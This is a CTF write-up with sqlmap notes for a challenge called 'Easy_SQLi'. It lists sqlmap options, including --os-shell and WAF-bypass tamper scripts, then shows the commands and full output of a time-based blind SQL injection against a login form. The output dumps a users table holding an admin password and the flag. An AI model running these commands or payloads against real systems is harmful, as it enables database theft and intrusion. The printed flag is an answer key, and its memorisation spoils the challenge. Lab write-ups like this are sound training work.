sqlmap學習筆記ing（1.Easy_SQLi（時間，表單注入））

題解

根據題目提示，應為SQL注入，題目頁面只有一個表單，用sqlmap進行表單注入。

使用--forms參數進行自動化表單注入，逐步得到flag。

### 總結參數作用：
-u        指定目標URL。
-C        指定列名（多個列用逗號分隔）。
-D        指定數據庫名。
-T        指定表名。
-r        從文件加載請求，保留請求細節，自動識別注入點。
--columns       枚舉指定表中的列。
--tables        枚舉指定數據庫中的表。
--dump          導出數據。
--dbs	        枚舉所有數據庫	sqlmap -u URL --dbs
--level	        測試深度(1-5)	--level 3（檢測Cookie注入）
--risk	        風險等級(1-3)	--risk 3（使用危險語句）
--proxy	        使用代理	--proxy="http://127.0.0.1:8080"
--tamper	    繞過WAF	--tamper=space2comment
--forms         自動處理表單，用于自動發現表單并注入。
--batch         無需用戶交互，自動選擇默認選項。
--current-db    獲取當前數據庫名。
--dump-all	    導出所有數據	sqlmap -u URL --dump-all
--os-shell	    獲取系統shell	sqlmap -u URL --os-shell

sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns
sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch --current-db_____H__                                                          ___ ___[(]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  [']_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:18:50 /2025-07-01/[05:18:50] [INFO] testing connection to the target URL
[05:18:50] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:18:51] [INFO] resuming back-end DBMS 'mysql' 
[05:18:51] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0518am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:18:51] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:18:51] [INFO] fetching current database
[05:18:51] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:18:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[05:19:10] [INFO] adjusting time delay to 1 second due to good response times
qsnctf
current database: 'qsnctf'

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf --tables_____H__                                                          ___ ___[,]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [,]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:27:27 /2025-07-01/[05:27:27] [INFO] testing connection to the target URL
[05:27:27] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:27:28] [INFO] resuming back-end DBMS 'mysql' 
[05:27:28] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0527am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:27:28] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Nginx 1.14.2
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:27:28] [INFO] fetching tables for database: 'qsnctf'
[05:27:28] [INFO] fetching number of tables for database 'qsnctf'
[05:27:28] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:27:31] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[05:27:37] [INFO] retrieved: 
[05:27:47] [INFO] adjusting time delay to 1 second due to good response times
users
Database: qsnctf
[1 table]
+-------+
| users |
+-------+

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users --columns_____H__                                                          ___ ___["]_____ ___ ___  {1.9.2#stable}                              
|_ -| . ["]     | .'| . |                                             
|___|_  [.]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:29:34 /2025-07-01/[05:29:34] [INFO] testing connection to the target URL
[05:29:34] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:29:34] [INFO] resuming back-end DBMS 'mysql' 
[05:29:34] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0529am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:29:35] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:29:35] [INFO] fetching columns for table 'users' in database 'qsnctf'                                                                   
[05:29:35] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:29:38] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[05:29:53] [INFO] adjusting time delay to 1 second due to good response times
3
[05:29:53] [INFO] retrieved: id
[05:30:01] [INFO] retrieved: int(11)
[05:30:32] [INFO] retrieved: username
[05:31:01] [INFO] retrieved: text
[05:31:20] [INFO] retrieved: password
[05:31:53] [INFO] retrieved: text
Database: qsnctf
Table: users
[3 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| id       | int(11) |
| password | text    |
| username | text    |
+----------+---------+

┌──(root💀kali)-[/home/kali/Desktop]
└─# sqlmap -u "http://challenge.qsnctf.com:30316/" --forms --batch -D qsnctf -T users -C id,password,username --dump_____H__                                                          ___ ___[.]_____ ___ ___  {1.9.2#stable}                              
|_ -| . [)]     | .'| . |                                             
|___|_  ["]_|_|_|__,|  _|                                             |_|V...       |_|   https://sqlmap.org                          [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 05:33:55 /2025-07-01/[05:33:55] [INFO] testing connection to the target URL
[05:33:55] [INFO] searching for forms
[1/1] Form:
POST http://challenge.qsnctf.com:30316/login.php
POST data: uname=&psw=
do you want to test this form? [Y/n/q] 
> Y
Edit POST data [default: uname=&psw=] (Warning: blank fields detected): uname=&psw=
do you want to fill blank fields with random values? [Y/n] Y
[05:33:56] [INFO] resuming back-end DBMS 'mysql' 
[05:33:56] [INFO] using '/root/.local/share/sqlmap/output/results-07012025_0533am.csv' as the CSV results file in multiple targets mode     
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: uname=1' AND (SELECT 8158 FROM (SELECT(SLEEP(5)))OZHS) AND 'yCGe'='yCGe&psw=1
---
do you want to exploit this SQL injection? [Y/n] Y
[05:33:56] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.14.2, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[05:33:56] [INFO] fetching entries of column(s) 'id,password,username' for table 'users' in database 'qsnctf'
[05:33:56] [INFO] fetching number of column(s) 'id,password,username' entries for table 'users' in database 'qsnctf'
[05:33:56] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[05:33:59] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
2
[05:34:10] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[05:34:18] [INFO] adjusting time delay to 1 second due to good response times
1
[05:34:20] [INFO] retrieved: 123456
[05:34:41] [INFO] retrieved: admin
[05:34:59] [INFO] retrieved: 2
[05:35:03] [INFO] retrieved: flag{ca74d097080346969f41c257318a7411}
[05:37:45] [INFO] retrieved: user
Database: qsnctf
Table: users
[2 entries]
+----+----------------------------------------+----------+
| id | password                               | username |
+----+----------------------------------------+----------+
| 1  | 123456                                 | admin    |
| 2  | flag{ca74d097080346969f41c257318a7411} | user     |
+----+----------------------------------------+----------+